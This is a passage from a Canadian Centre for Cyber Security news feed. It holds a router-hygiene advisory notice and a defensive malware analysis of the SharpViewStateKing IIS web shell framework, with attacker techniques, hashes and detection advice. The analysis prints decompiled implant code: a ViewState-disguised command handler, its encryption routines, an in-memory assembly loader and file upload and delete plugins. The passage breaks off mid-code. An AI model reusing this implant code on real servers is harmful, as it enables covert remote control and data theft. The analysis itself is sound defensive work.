class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> </div> </div> </div> </div> </div> </div> </div> </article>
- Joint guidance on improving router hygiene to protect against Russian state-sponsored targetingby Canadian Centre for Cyber Security on July 13, 2026 at 5:41 pm
<article data-history-node-id="7949" about="/en/news-events/joint-guidance-improving-router-hygiene-protect-against-russian-state-sponsored-targeting" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) has joined the United Statesā National Security Agency (NSA) and the following international partners in releasing cyber security guidance on improving router hygiene to protect against Russian state-sponsored targeting:</p> <ul><li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li> <li>Czech Republicās National Cyber and Information Security Agency (NĆKIB)</li> <li>Danish Defence Intelligence Service (DDIS)</li> <li>Estonian Foreign Intelligence Service (EFIS)</li> <li>Estonian Information System Authority (RIA)</li> <li>Finnish Defence Intelligence Agency (FDI)</li> <li>Finnish Security and Intelligence Service (SUPO)</li> <li>French Cyber Security Agency (ANSSI)</li> <li>Italian External Intelligence and Security Agency (AISE)</li> <li>Italian Internal Intelligence and Security Agency (AISI)</li> <li>New Zealandās National Cyber Security Centre (NCSC-NZ)</li> <li>Swedish National Cyber Security Centre (NCSC-SE)</li> <li>The Military Counterintelligence Service of Poland (SKW)</li> <li>United Kingdomās National Cyber Security Centre (NCSC-UK)</li> <li>United Statesā Cybersecurity and Infrastructure Security Agency (CISA)</li> <li>United Statesā Department of Defense Cyber Crime Center (DC3)</li> <li>United Statesā Federal Bureau of Investigation (FBI)</li> </ul><p>This joint guidance details how cyber actors from the Russian Federal Security Service (FSB) Center 16 continue to exploit poorly configured and vulnerable networking devices worldwide, opportunistically targeting multiple critical infrastructure sector networks. It builds on the <abbr title="US Federal Bureau of Investigation">FBI</abbr>ās public service announcement, <a href="https://www.ic3.gov/PSA/2025/PSA250820">Russian government cyber actors targeting networking devices, critical infrastructure</a>, concerning the decade-long <abbr title="Russian Federal Security Service">FSB</abbr> Center 16ās cyber activity. This guidance also provides additional tactics, techniques, and procedures to help defenders to better understand and counter the threat.</p> <p>The authoring agencies urge device owners and network defenders to take mitigation and remediation actions against Russian government-sponsored exploitation of vulnerable routers.</p> <p>Consult the full joint guidance: <a href="https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/1/CSA_IMPROVE_ROUTER_HYGIENE.PDF">Improve router hygiene to protect against Russian state-sponsored targeting</a>.</p> </div> </div> </div> </div> </div> </article>
- SharpViewStateKing: The stealthy implant frameworkby Canadian Centre for Cyber Security on July 10, 2026 at 2:29 pm
<article data-history-node-id="7756" about="/en/news-events/sharpviewstateking-stealthy-implant-framework" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) is actively tracking a compromise that exploited several web shell payloads, enabling multiple hacking techniques. Following incident response activities, analysis revealed that the web shell was part of a stealthy implant framework called <strong>SharpViewStateKing</strong><sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>.</p> <p>The Cyber Centre has compiled a detailed analysis derived from a recent investigation to help defenders combat attacks leveraging these techniques. This analysis examines the <strong>use of standard ASP.NET HTTP requests to blend in with traffic</strong> and provides an <strong>in-depth characterization of the threat actorās techniques</strong>, along with critical mitigation and detection guidance.</p> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#1">Executive summary</a></li> <li><a href="#2">An incident overview</a></li> <li><a href="#3">Analysis of the incident</a></li> <li><a href="#4">Plugin capabilities observed during analysis</a></li> <li><a href="#5">Indicators of compromise and recommendations</a></li> <li><a href="#6">Cyber Centre tools and services</a></li> <li><a href="#7">Acknowledgments</a></li> <li><a href="#8">References</a></li> </ul></details></section><h2 class="text-info" id="1">Executive summary</h2> <p>In late December 2025, the Cyber Centre detected what appeared to be a web shell on a public-facing Microsoft Internet Information Services (IIS) server running a commercially available ASP.NET application. Incident response activities were initiated and analysis revealed that this web shell was part of a stealthy implant framework called SharpViewStateKing. This technical article aims to raise awareness, provide detection guidance, and highlight remediation actions associated with the malicious modules. What follows is derived from endpoint telemetry and process memory captured during the incident.</p> <h2 class="text-info" id="2">An incident overview</h2> <section class="alert alert-info"><p><strong>Note:</strong> MITRE ATT&CK technique reference numbers have been integrated throughout the article to standardize threat descriptions.</p> </section><p>SharpViewStateKing is a modular framework consisting of a graphical user interface (GUI) that enables the loading of ASP.NET modules (plugins) into exploited <abbr title="Internet Information Services">IIS</abbr> servers.</p> <div class="clearfix">Ā </div> <figure><figcaption class="h4 text-center">Figure 1: SharpViewStateKing controller <abbr title="graphical user interface">GUI</abbr></figcaption><img alt="Fig 1: SharpViewStateKing controller GUI – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/sharpviewstateking-fig1-e.png" /></figure><details><summary>Figure 1 long description – SharpViewStateKing controller <abbr title="graphical user interface">GUI</abbr></summary><p>The figure displays the <abbr title="graphical user interface">GUI</abbr> of the SharpViewStateKing controller, featuring a modular layout that enables the loading and management of ASP.NET plugins on compromised <abbr title="Internet Information Services">IIS</abbr> servers. The interface includes controls for selecting plugins, executing commands, and monitoring the status of loaded modules, designed to facilitate threat actor operations while remaining discreet.</p> </details><div class="clearfix">Ā </div> <p>Plugins are written in the C# programming language and embedded as serialized .NET objects in the <strong>Resource</strong> section of the SharpViewStateKing executable (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>, <a href="https://attack.mitre.org/techniques/T1620/">T1620</a>).</p> <div class="clearfix">Ā </div> <figure><figcaption class="h4 text-center">Figure 2: SharpViewStateKing payload-resource <abbr title="JavaScript Object Notation">JSON</abbr> file</figcaption><img alt="Fig 2: SharpViewStateKing payload-resource JSON file – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/sharpviewstateking-fig2-e.png" /></figure><details><summary>Figure 2 long descriptionĀ ā SharpViewStateKing payload-resource <abbr title="JavaScript Object Notation">JSON</abbr> file</summary><p><strong>Ā </strong>The figure displays an <abbr title="hypertext transfer protocol">HTTP</abbr> response body rendered in a <abbr title="JavaScript Object Notation">JSON</abbr> inspector. The payload is a single <abbr title="JavaScript Object Notation">JSON</abbr> object whose keys correspond to remote procedure/command endpoints, and each value is a long base64-encoded binary blob. <abbr title="user interface">UI</abbr> controls and tabs indicate this is a developer or proxy tool viewing the structured response.</p> </details><div class="clearfix">Ā </div> <p>Remote code execution was achieved by leveraging compromised ViewState parameters in the ASP.NET application running on the compromised <abbr title="Internet Information Services">IIS</abbr> server<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>). Although the method of how these parameters were obtained is out of scope for this document, an example of how these were leveraged in a separate malware campaign can be found in the Cyber Centreās publication on SharePoint vulnerabilities.</p> <p>Traditional web shells typically operate by creating a new page on the web server or by injecting code that intercepts <abbr title="hypertext transfer protocol">HTTP</abbr> requests directed to legitimate web pages. This enables threat actors to interact with the compromised server, as the webĀ shell can respond to requests from their command and control (C2) infrastructure. However, through the analysis of endpoint telemetry and process memory captured during the incident, the Cyber Centre identified a novel technique.</p> <p>This analysis indicated that the threat actor likely leveraged the SharpViewStateKing implant framework to deploy new compiled plugins for every command sent to the compromised server, rendering it functionally stateless (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>). Additionally, the deployed plugin code remained resident in memory, even when dormant, until the process restarted.</p> <p>Detection opportunities for this implant family are limited due to the following factors:</p> <ul><li>plugins are compiled on the threat actorās host immediately before being sent to the target server. Since compilation actions did not take place on the exploited server, the <strong><code>csc.exe</code></strong> (C# compiler) process was never observed, and hash-based detections became challenging due to dynamically generated compilation timestamps that occur immediately prior to loading the module</li> <li>network communications occur over legitimate looking <abbr title="hypertext transfer protocol">HTTP</abbr> or <abbr title="hypertext transfer protocol secure">HTTPS</abbr> traffic. In this incident the traffic was encrypted over <abbr title="hypertext transfer protocol secure">HTTPS</abbr> which limited visibility (<a href="https://attack.mitre.org/techniques/T1071/001/">T1071.001</a>).</li> <li>plugins are loaded directly into the <abbr title="Internet Information Services">IIS</abbr> process memory on the compromised server. They were never written to disk (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>)</li> <li>loaded plugins do not appear in the list of loaded modules (dynamic-link library or DLL) for the <abbr title="Internet Information Services">IIS</abbr> server process</li> </ul><p>Despite these limitations, the Cyber Centre was able to identify several noteworthy insights:</p> <ul><li>C# can be decompiled back into a readable C# source code. Since it was compiled into an intermediate language (bytecode), the compilation process could be reversed using CCCSā open-source file triage platform, <a href="/en/tools-services/assemblyline">Assemblyline</a>. By implementing a decompiler service for C# bytecode, custom YARA rules could be created to target C# code instead of compiled DLLs, resulting in more flexible detection rules</li> <li>with certain configurations, the Anti-Malware Scan Interface (AMSI) mechanism is triggered when .NET code modules are loaded into memory. Although the malware appeared to have <abbr title="Anti-Malware Scan Interface">AMSI</abbr>-bypass capabilities, they were not deployed during this specific incident, allowing traditional anti-virus programs to inspect the bytecode</li> <li>the implant uses a static string for the <strong><code>__VIEWSTATE</code></strong> parameter in <abbr title="hypertext transfer protocol">HTTP</abbr> POST requests. This string was found in process memory when the plugins were loaded</li> <li>in some scenarios, ViewState deserialization errors can be written to server logs when loading the plugins due to the hard-coded <strong><code>__VIEWSTATE</code></strong> However, in this incident no deserialization errors were observed</li> <li>also associated with the Godzilla implant, <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> header fields in <abbr title="hypertext transfer protocol">HTTP</abbr> server logs can be used as indicators. Since some legitimate software uses fields with these names, they were not strong indicators by themselves</li> <li>the compilation/link time in the resulting Portable Executable (PE) file header will be recent, within seconds of it being loaded. Since this is not uncommon for ASP.NET pages, they were not strong indicators by themselves</li> <li>detection opportunities will arise as the threat actor stages new capabilities on the compromised host or uses living off the land (LOTL) binaries as part of their post-exploitation activities. An effective method of detection was to monitor children of the <abbr title="Internet Information Services">IIS</abbr> <strong><code>w3wp.exe</code></strong> worker process</li> </ul><!–** TOP OF PAGE ******–><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="3">Analysis of the incident</h2> <p>Within the first 30 minutes of the incident, 67 distinct code modules based on their SHA-256 hash were deployed to the compromised host. Once decompiled, it became apparent that there was significant duplication. For example, 42 different copies of the FileUpload plugin, each with its own unique hash, were used to stage and execute several different capabilities via the RemoteExec plugin, as listed below:</p> <ul><li><strong>EfsPotato:</strong> one of many in the "Potatoā exploit family, EfsPotato is an open-source local privilege escalation tool used in cyberattacks to elevate user permissions from a low-privileged service account to the highest level of authority on Windows systems (<strong><code>NT AUTHORITY\SYSTEM</code></strong>) (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>, <a href="https://attack.mitre.org/techniques/T1134/001/">T1134.001</a>)</li> <li><strong>SoftEther <abbr title="virtual private network">VPN</abbr>:</strong> open-source, cross-platform, multi-protocol <abbr title="virtual private network">VPN</abbr> client and <abbr title="virtual private network">VPN</abbr> server software used by the threat actor to traverse network address translation (NAT) and bypass firewalls for remote desktop protocol (RDP) connections (<a href="https://attack.mitre.org/techniques/T1133/">T1133</a>)</li> <li><strong>rar.exe:</strong> command-line file archiver and compression tool that is part of the powerful archive manager WinRAR; used to extract files staged for execution and compress files for exfiltration (<a href="https://attack.mitre.org/techniques/T1560/001/">T1560.001</a>)</li> <li><strong>secretsdump.exe:</strong> compiled version of the Impacket secretsdump.py<sup id="fn3-rf"><a class="fn-lnk" href="#fn3"><span class="wb-inv">Footnote </span>3</a></sup> tool used to extract various sensitive secrets from a host, including user hashes, data protection application programming interface (DPAPI) secrets, clear text credentials, and more (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> <li><strong>perunner.exe:</strong> tool used to extract memory from the Local Security Authority Subsystem Service (LSASS) process (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> <li><strong>fuck.exe:</strong> custom executable used to modify the <strong><code>ValidationKey</code></strong> and <strong><code>DecryptionKey</code></strong> values in the web.config of the compromised web application (<a href="https://attack.mitre.org/techniques/T1556/001/">T1556.001</a>)<br /> SHA-256: <strong><code>2FF2E5B7DA1A70886DB220E0806ABA24AD6648BA2DC40E101D5D718D1BCBD7B6</code></strong></li> <li><strong>bypass.exe: </strong>SHA-256: <strong><code>6DF013608D0BEC6D2743AD45108C43922DBFDE28DDBEC8B8D63F3E0B23401DF2</code></strong></li> <li><strong>HttpCgiModule.dll: </strong>32-bit component of the BadIIS implant<br /> SHA-256: <strong><code>637c7bd4d2b5c29cc2f6db802ed1cd4d4c9b49ef7e6751a38d22f9337361c2cf</code></strong></li> <li><strong>HttpFastCgiModule.dll: </strong>64-bit component of the BadIIS implant<br /> SHA-256: <strong><code>b6a009dc9984bf49e84e4885c87bcc0ce371f98ab2c28e71d5ebbcc0855adfce</code></strong></li> </ul><p>By leveraging the RemoteExec plugin, the threat actor created a new administrator account on the compromised host (<a href="https://attack.mitre.org/techniques/T1136/001/">T1136.001</a>) then launched <strong><code>wmic.exe</code></strong> to configure exclusions in Microsoft Defender (<a href="https://attack.mitre.org/techniques/T1562/001/">T1562.001</a>), effectively neutering it. The new account and the SoftEther <abbr title="virtual private network">VPN</abbr> access were then used to log in remotely via <abbr title="remote desktop protocol">RDP</abbr> and move laterally to other hosts using PsExec (<a href="https://attack.mitre.org/techniques/T1569/002/">T1569.002</a>, <a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>) and the credentials harvested using the tools listed above (<a href="https://attack.mitre.org/techniques/T1078/">T1078</a>).</p> <h2 class="text-info" id="4">Plugin capabilities observed during analysis</h2> <p>The information below is based on the SharpViewStateKing plugins deployed by the threat actor and extracted from <abbr title="Internet Information Services">IIS</abbr> process memory. To avoid redundancy, the following three methods were found in each of the payloads:</p> <h3>Constructor</h3> <p>The <abbr title="hypertext transfer protocol">HTTP</abbr> request handler (the communication interface) received encrypted commands from the threat actor, executed them, encrypted the results, then sent them back disguised as normal web traffic. The constructorās logic is as follow:</p> <ul><li>gets the current <abbr title="hypertext transfer protocol">HTTP</abbr> context (the web request being processed) and associated <abbr title="hypertext transfer protocol">HTTP</abbr> objects</li> <li>extracts the <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> parameters from the request (threat actor-controlled input), then decodes from Base64 to get raw bytes</li> <li>calls <strong><code>Dec()</code></strong> to decrypt the raw bytes</li> <li>calls a plugin-specific function with these arguments to perform an action</li> <li>converts the output to UTF-8 bytes, calls <strong><code>Enc()</code></strong> to encrypt the bytes, then Base64-encodes the encrypted result</li> <li>disguises the output by embedding it in ASP.NET ViewState properties <ul><li> <pre> <code><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcyODc4…" /></code></pre> </li> <li>The prefix <strong><code>/wEPDwUKLTcyODc4</code></strong> remains static and mimics legitimate ViewState to avoid triggering security tools</li> </ul></li> <li>sends the response as HTML back to the threat actor</li> </ul><div class="clearfix">Ā </div> <h4 class="text-center">Figure 3: Constructor for FileUpload plugin</h4> <div class="container"> <pre> <code> public class FileUpload { public FileUpload() { HttpContext current = HttpContext.Current; try { if (HttpContext.Current != null) { HttpRequest request = current.Request; HttpResponse response = current.Response; byte[] content = Dec(Convert.FromBase64String(request["__SCROLLPOSITION"])); byte[] bytes = Dec(Convert.FromBase64String(request["__SCROLLPATH"])); string s = UploadFile(content, Encoding.UTF8.GetString(bytes)); response.Write("<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcyODc4" + Convert.ToBase64String(Enc(Encoding.UTF8.GetBytes(s))) + "" />"); response.End(); } } catch (Exception ex) { current.Response.Write(ex.Message); current.Response.End(); } } } </code> </pre> </div> <details><summary>Figure 3 long descriptionĀ – Constructor for FileUpload plugin</summary><p>The figure shows a C# code snippet defining a FileUpload class whose constructor uses HttpContext.Current to handle an <abbr title="hypertext transfer protocol">HTTP</abbr> request and response within a try-catch block. It reads two Base64-encoded values from the request, decodes them into a byte array and a path string, calls UploadFile with the content and decoded path, then writes a hidden input containing an encoded VIEWSTATE value to the response before ending it. On exception, it writes the error message to the response and terminates the request.</p> </details><div class="clearfix">Ā </div> <h3>Decrypt function</h3> <p>This method decrypted data received from the threat actor via the <strong><code>__SCROLLPATH</code></strong> and/or <strong><code>__SCROLLPOSITION</code></strong> <abbr title="hypertext transfer protocol">HTTP</abbr> header fields. It was used in every observed plugin except for ListDirectory, which did not encrypt its lone path argument.</p> <p>Rijndael-128 in CBC mode (AES-128-CBC) is used as the encryption/decryption algorithm (<a href="https://attack.mitre.org/techniques/T1573/001/">T1573.001</a>). The first 32-bytes of the buffer passed to the function are used as the symmetric decryption key and initialization vector (IV).</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 4: Decrypt function using Rijndael-128 in CBC mode (AES-128-CBC)</h4> <div class="container"> <pre> <code> public static byte[] Dec(byte[] data) { byte[] array = new byte[16]; byte[] array2 = new byte[16]; Array.Copy(data, 0, array, 0, 16); Array.Copy(data, 16, array2, 0, 16); Console.WriteLine(new Guid(array)); Console.WriteLine(new Guid(array2)); MemoryStream memoryStream = new MemoryStream(); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 128; rijndaelManaged.Mode = CipherMode.CBC; rijndaelManaged.Padding = PaddingMode.PKCS7; CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateDecryptor(array2, array), CryptoStreamMode.Write); cryptoStream.Write(data, 32, data.Length – 32); cryptoStream.FlushFinalBlock(); return memoryStream.ToArray(); } </code> </pre> </div> <details><summary>Figure 4 long descriptionĀ – Decrypt function using Rijndael-128 in CBC mode (AES-128-CBC)</summary><p>The figure shows a C# method Dec that decrypts a byte array using Rijndael-128 in CBC mode (AES-128-CBC) with PKCS7 padding. It splits the input into two 16-byte segments for <abbr title="initialization vector">IV</abbr> and key, logs them as <abbr title="Global Unique Identifiers">GUIDs</abbr>, configures a Rijndael-managed instance (128-bit block and key sizes), then creates a CryptoStream to decrypt the remaining bytes (from offset 32 onward) and returns the resulting plaintext as a new byte array. The code uses a MemoryStream to collect the decrypted data and flushes the final block before conversion.</p> </details><div class="clearfix">Ā </div> <p>Since both values are written directly to the request data without any cryptographic protection of their own, they can be recovered from server <abbr title="hypertext transfer protocol">HTTP</abbr> logs or network captures. This is possible if <abbr title="hypertext transfer protocol">HTTP</abbr> was used as the application layer protocol, or if <abbr title="hypertext transfer protocol secure">HTTPS</abbr> was de-encapsulated. Leveraging these values to decrypt uploaded data would then be a trivial matter, using a tool like <a href="https://gchq.github.io/CyberChef/">CyberChef</a>.</p> <h3>Encrypt function</h3> <p>Plugins encrypt data before sending it back to the threat actor via the <abbr title="hypertext transfer protocol">HTTP</abbr> response using Rijndael-128 in CBC mode (AES-128-CBC) (<a href="https://attack.mitre.org/techniques/T1573/001/">T1573.001</a>). The symmetric encryption key and initialization vector (IV) are generated pseudo-randomly using <strong><code>Guid.NewGuid().ToByteArray()</code></strong> and prepended to the encrypted response data. The <strong><code>Guid.NewGuid()</code></strong> method is not considered cryptographically secure and guarantees, at most, 122 bits of entropy.</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 5: Encrypt function using Rijndael (AES-128) in CBC mode</h4> <div class="container"> <pre> <code> public static byte[] Enc(byte[] data) { byte[] array = Guid.NewGuid().ToByteArray(); byte[] array2 = Guid.NewGuid().ToByteArray(); MemoryStream memoryStream = new MemoryStream(); memoryStream.Write(array, 0, array.Length); memoryStream.Write(array2, 0, array2.Length); RijndaelManaged rijndaelManaged = new RijndaelManaged(); rijndaelManaged.BlockSize = 128; rijndaelManaged.KeySize = 128; rijndaelManaged.Mode = CipherMode.CBC; rijndaelManaged.Padding = PaddingMode.PKCS7; CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array2, array), CryptoStreamMode.Write); cryptoStream.Write(data, 0, data.Length); cryptoStream.FlushFinalBlock(); return memoryStream.ToArray(); } </code> </pre> </div> <details><summary>Figure 5 long descriptionĀ – Encrypt function using Rijndael (AES-128) in CBC mode</summary><p>The figure shows a C# method Enc that encrypts a byte array using Rijndael-128 in CBC mode (AES-128-CBC) with PKCS7 padding. It generates two <abbr title="Global Unique Identifiers">GUIDs</abbr> to serve as the <abbr title="initialization vector">IV</abbr> and key, writes them to a MemoryStream prefixing the ciphertext, then uses a CryptoStream to encrypt the input data and flushes the final block before returning the combined byte array. The configuration sets both block size and key size to 128 bits, producing an output that begins with the <abbr title="initialization vector">IV</abbr> and key followed by the encrypted payload.</p> </details><div class="clearfix">Ā </div> <p>Since both values are written directly to the response data without any cryptographic protection of their own, they can be recovered from server <abbr title="hypertext transfer protocol">HTTP</abbr> logs or network captures. This is possible if <abbr title="hypertext transfer protocol">HTTP</abbr> was used as the application layer protocol, or if <abbr title="hypertext transfer protocol secure">HTTPS</abbr> was de-encapsulated. Leveraging these values to decrypt exfiltrated data would then be a trivial matter, if using a tool like <a href="https://gchq.github.io/CyberChef/">CyberChef</a>.</p> <!–** TOP OF PAGE ******–> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h3>Observation 1</h3> <p><strong>Main capability</strong>: ExecuteAssembly</p> <p><strong>Observed technique</strong>: ExecuteAssembly (<a href="https://attack.mitre.org/techniques/T1620/">T1620</a>)</p> <p>This plugin implements a class that enables the threat actor to load an arbitrary ASP.NET assembly directly from a memory buffer, providing the threat actor with fileless execution capability for post-exploitation and allowing them to bypass disk-based detection. For example, it was used to load and execute the EfsPotato privilege escalation exploit directly into the memory of the compromised host.</p> <p>The plugin includes two methods:</p> <ol><li><strong>ParseArgs(string input):</strong> takes a raw command-line argument string and parses it into a properly formatted string array by iterating through each character while tracking quote boundaries with a Boolean flag. <ul><li>This allowed the payload to receive arguments exactly as if they were launched from the command-line, making in-memory execution behave like a normal program launch and enabling the threat actor to pass command-line parameters to malicious .NET assemblies.</li> </ul></li> <li><strong>ExecuteAssembly(byte[] assembly, byte[] bArgs):</strong> redirects <strong><code>Console.Out</code></strong> and <strong><code>Console.Error</code></strong> streams to an in-memory <strong><code>MemoryStream</code></strong> and uses <strong><code>Assembly.Load()</code></strong> to load the .NET assembly bytes directly into process memory without writing to disk. <ul><li>This retrieved the assemblyās <strong><code>Main</code></strong> method using <strong><code>ENTRYPOINT</code></strong> instructions then invoked it with the parsed command-line arguments, capturing all console output (<strong><code>stdout/stderr</code></strong>) produced during execution into <strong><code>MemoryStream</code></strong> and converting it to a UTF-8 string. The result was returned via <abbr title="hypertext transfer protocol">HTTP</abbr> response by the constructor.</li> </ul></li> </ol><div class="clearfix">Ā </div> <h4 class="text-center">Figure 6: ExecuteAssembly method in LoadAndExecuteAssembly class</h4> <div class="container"> <pre> <code> public class LoadAndExecuteAssembly { public static string ExecuteAssembly(byte[] assembly, byte[] bArgs) { string empty = string.Empty; try { TextWriter textWriter = Console.Out; TextWriter error = Console.Error; MemoryStream memoryStream = new MemoryStream(); StreamWriter streamWriter = new StreamWriter(memoryStream); streamWriter.AutoFlush = true; Console.SetOut(streamWriter); Console.SetError(streamWriter); Assembly assembly2 = Assembly.Load(assembly); MethodInfo entryPoint = assembly2.EntryPoint; string[] array = ParseArgs(Encoding.UTF8.GetString(bArgs)); entryPoint.Invoke(null, new object[1] { array }); empty = Encoding.UTF8.GetString(memoryStream.ToArray()); Console.SetOut(textWriter); Console.SetError(error); streamWriter.Close(); memoryStream.Close(); } catch (Exception ex) { empty = "Error: " + ex; } return empty; } } </code> </pre> </div> <details><summary>Figure 6 long descriptionĀ – ExecuteAssembly method in LoadAndExecuteAssembly class</summary><p>The figure shows a C# class LoadAndExecuteAssembly with a public static method ExecuteAssembly that loads a .NET assembly from a byte array and invokes its entry point with arguments parsed from another byte array. Before invocation, it redirects Console.Out and Console.Error to a MemoryStream via a StreamWriter to capture all console output, then restores the original streams and returns the captured text; on failure, it returns a formatted error string. The code manages resources by closing the writer and stream after execution.</p> </details><div class="clearfix">Ā </div> <h3>Observation 2</h3> <p><strong>Main capability:</strong> FileDelete</p> <p><strong>Observed technique:</strong> FileDelete (<a href="https://attack.mitre.org/techniques/T1070/004/">T1070.004</a>)</p> <p>This plugin implements a class that enables the threat actor to remotely delete a file from the victimās filesystem. It receives an encrypted file path via <abbr title="hypertext transfer protocol">HTTP</abbr>, deletes the specified file, then returns an encrypted confirmation message. The threat actor used this capability to cover their tracks and delete previously staged files.</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 7: fileDelete method in FileDelete class</h4> <div class="container"> <pre> <code> public class FileDelete { public static string fileDelete(string filePath) { try { if (File.Exists(filePath)) { File.Delete(filePath); } return "Delete successful"; } catch (Exception ex) { return ex.Message; } } } </code> </pre> </div> <details><summary>Figure 7 long descriptionĀ – fileDelete method in FileDelete class</summary><p>The figure displays a snippet of C# code defining a class named FileDelete with a public static method, fileDelete, that accepts a file path string. Inside a try-catch block, the method checks if the file exists, deletes it if present, and returns āDelete successfulā; if an exception occurs, it returns the exceptionās message.</p> </details><div class="clearfix">Ā </div> <h3>Observation 3</h3> <p><strong>Main capability:</strong> FileUpload</p> <p><strong>Observed technique:</strong> FileUpload (<a href="https://attack.mitre.org/techniques/T1608/001/">T1608.001</a>)</p> <p>This plugin implements a class that enables the threat actor to remotely upload files to the victimās filesystem. It received an encrypted file path and its contents via <abbr title="hypertext transfer protocol">HTTP</abbr>, wrote the content to the specified path, then returned an encrypted confirmation message.</p> <div class="clearfix">Ā </div> <h4 class="text-center">Figure 8: UploadFile method in FileUpload class</h4> <div class="container"> <pre> <code> public class FileUpload { public static string UploadFile(byte[] content, string filePath) { try { FileStream fileStream = new FileStream(filePath, FileMode.Append); fileStream.Write(content, 0, content.Length); fileStream.Close(); return "Upload successful"; } catch (Exception ex) { return ex.Message; } } } </code> </pre> </div> <details><summary>Figure 8 long descriptionĀ – UploadFile method in FileUpload class</summary><p>The figure shows a C# code snippet defining a class named FileUpload with a public static method UploadFile that takes a byte array and a file path. Inside a try-catch block, it opens a FileStream in append mode, writes the byte content to the file, closes the stream, and returns āUpload successful,ā while any exception results in returning the exceptionās message.</p> </details><div class="clearfix">Ā </div> <h3>Observation 4</h3> <p><strong>Main capability:</strong> Information</p> <p><strong>Observed technique:</strong> Information (<a href="https://attack.mitre.org/techniques/T1082/">T1082</a>, <a href="https://attack.mitre.org/techniques/T1057/">T1057</a>)</p> <p>This was the first plugin deployed to the compromised host. It implemented a class that retrieved the following detailed system information in a <abbr title="JavaScript Object Notation">JSON</abbr> string:</p> <ul><li>current working directory for the process</li> <li>current āwebā directory for the process</li> <li>content from two registry keys<br /><strong><code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName</code></strong><br /><strong><code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion</code></strong></li> <li>all disk drives, including free space</li> <li>all network interfaces</li> <li>all running processes</li> </ul><div class="clearfix">Ā </div> <h4 class="text-center">Figure 9: GetSystemInformation method in Information class</h4> <div class="container"> <pre> <code> public class Information { public static string GetSystemInformation(string data = null) { string currentDirectory = Directory.GetCurrentDirectory(); string text = $" Current Directory: {currentDirectory}\r\n"; text += string.Format("Current Web Directory: {0}\r\n\r\n", HttpContext.Current.Server.MapPath(".")); RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"); if (registryKey != null) { text += string.Format("Windows Product Name: {0}\r\n", registryKey.GetValue("ProductName")); text += string.Format(" Windows Version: {0}\r\n\r\n", registryKey.GetValue("CurrentVersion")); } DriveInfo[] drives = DriveInfo.GetDrives(); foreach (DriveInfo driveInfo in drives) { if (driveInfo.IsReady) { text += $"Disk drive {driveInfo.Name}\r\n"; text += $" Disk size: {driveInfo.TotalSize / 1024L / 1024L / 1024L} GB\r\n"; text += $" Free space: {driveInfo.AvailableFreeSpace / 1024L / 1024L / 1024L} GB\r\n"; } } text += "\r\n"; NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); NetworkInterface[] array = allNetworkInterfaces; foreach (NetworkInterface networkInterface in array) { if (networkInterface.Name.ToLower().Contains("loopback")) { continue; } IPInterfaceProperties iPProperties = networkInterface.GetIPProperties(); UnicastIPAddressInformationCollection unicastAddresses = iPProperties.UnicastAddresses; string text2 = string.Empty; string text3 = string.Empty; foreach 